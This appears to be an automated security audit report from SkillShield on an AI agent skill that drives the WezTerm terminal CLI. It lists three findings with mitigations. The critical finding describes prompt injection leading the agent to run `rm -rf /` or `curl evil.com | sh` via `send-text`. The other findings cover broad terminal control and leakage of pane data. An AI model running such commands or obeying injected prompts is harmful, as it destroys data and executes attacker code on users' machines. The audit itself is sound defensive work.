Security Audit
wezterm
github.com/Mrc220/agent_flywheel_clawdbot_skills_and_integrationsTrust Assessment
wezterm received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings: 1 critical, 1 high, 1 medium, and 0 low severity. Key findings include Direct Command Injection via `wezterm cli send-text`, Broad Terminal Control and System Access via WezTerm CLI, Exposure of Sensitive Terminal Session Data.
The analysis covered 4 layers: llm_behavioral_safety, dependency_graph, static_code_analysis, manifest_analysis. The llm_behavioral_safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 11, 2026 (commit c7bd8e0f). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Direct Command Injection via `wezterm cli send-text` The skill exposes the `wezterm cli send-text` command, which allows an AI agent to send arbitrary text to an active terminal pane. This text is then executed by the shell running in that pane. An attacker could craft a prompt to trick the agent into sending malicious commands (e.g., `rm -rf /`, `curl evil.com | sh`) to the user's terminal, leading to arbitrary code execution on the host system. Restrict the `send-text` command to a predefined set of safe commands or disallow arbitrary text input. Implement strict input validation and sanitization if any user-controlled input is passed to this command. Consider if this capability is truly necessary for the agent's intended function. | Unknown | SKILL.md:79 | |
| HIGH | Broad Terminal Control and System Access via WezTerm CLI The skill grants the AI agent extensive control over the WezTerm terminal emulator, including the ability to list all running panes and their commands (`wezterm cli list`), create new terminal sessions with arbitrary commands (`wezterm cli spawn`, `wezterm start`), and inject commands into existing sessions (`wezterm cli send-text`). This level of access is highly privileged and effectively provides the agent with a shell-like interface to the user's system, enabling potential for arbitrary code execution, data exfiltration, and system manipulation if the agent is compromised or misused. Re-evaluate the necessity of granting such broad terminal control to an AI agent. If specific WezTerm functionalities are required, consider creating more granular, sandboxed tools that expose only the minimum necessary capabilities, with strict input validation and output filtering. Avoid direct exposure of powerful CLI tools like `wezterm cli`. | Unknown | SKILL.md:1 | |
| MEDIUM | Exposure of Sensitive Terminal Session Data The `wezterm cli list` command, especially with `--format json`, can expose detailed information about all active terminal panes, including their current working directories, titles, and potentially the commands being executed within them. An agent, if prompted maliciously, could use this command to gather sensitive information about the user's ongoing work or system state, which could then be exfiltrated. If the agent needs to list panes, filter the output to only include non-sensitive information. Avoid exposing raw, unfiltered output from `wezterm cli list` to the agent or to external channels. Implement strict output sanitization. | Unknown | SKILL.md:14 |
Scan History
Embed Code
[](https://skillshield.io/report/580a8214b095535b)
Powered by SkillShield